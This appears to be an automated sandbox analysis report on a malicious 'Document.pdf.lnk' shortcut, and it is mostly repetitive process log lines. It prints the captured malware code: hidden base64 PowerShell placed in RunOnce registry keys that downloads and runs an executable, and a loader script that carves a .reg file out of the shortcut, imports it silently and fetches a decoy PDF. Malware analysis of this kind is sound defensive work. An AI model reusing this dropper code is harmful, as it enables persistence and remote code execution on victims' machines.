Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelper powershell -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlAFwAJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticTool powershell -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQBNAFAAKQBcAEIAYQB0AHQAZQByAHkARABpAGEAZwBuAG8AcwB0AGkAYwAiADsAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABkACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACkAewBOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABkAH0AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABhACAALQBPAHUAdABGAGkAbABlACAAIgAkAGQAXABCAGEAdAB0AGUAcgB5AEQAaQBhAGcAbgBvAHMAdABpAGMAVABvAG8AbAAuAGUAeABlACIAOwAgAEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACIAJABkAFwAQgBhAHQAdABlAHIAeQBEAGkAYQBnAG4AbwBzAHQAaQBjAFQAbwBvAGwALgBlAHgAZQAiAA==Jump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticTool powershell -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQBNAFAAKQBcAEIAYQB0AHQAZQByAHkARABpAGEAZwBuAG8AcwB0AGkAYwAiADsAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABkACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACkAewBOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABkAH0AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABhACAALQBPAHUAdABGAGkAbABlACAAIgAkAGQAXABCAGEAdAB0AGUAcgB5AEQAaQBhAGcAbgBvAHMAdABpAGMAVABvAG8AbAAuAGUAeABlACIAOwAgAEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACIAJABkAFwAQgBhAHQAdABlAHIAeQBEAGkAYQBnAG4AbwBzAHQAaQBjAFQAbwBvAGwALgBlAHgAZQAiAA==Jump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelperJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticToolJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}{$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''"' + $currentPath + '"'' ;$dirPath = Get-Location;Set-Location -Path ''"' + $dirPath.Path + '"'' ;$lnkpaths = Get-ChildItem -Path ''"' + $dirPath.Path + '"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'Afte
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelperJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelperJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelperJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelperJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticToolJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticToolJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticToolJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticToolJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: pdf.lnkStatic PE information: Document.pdf.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
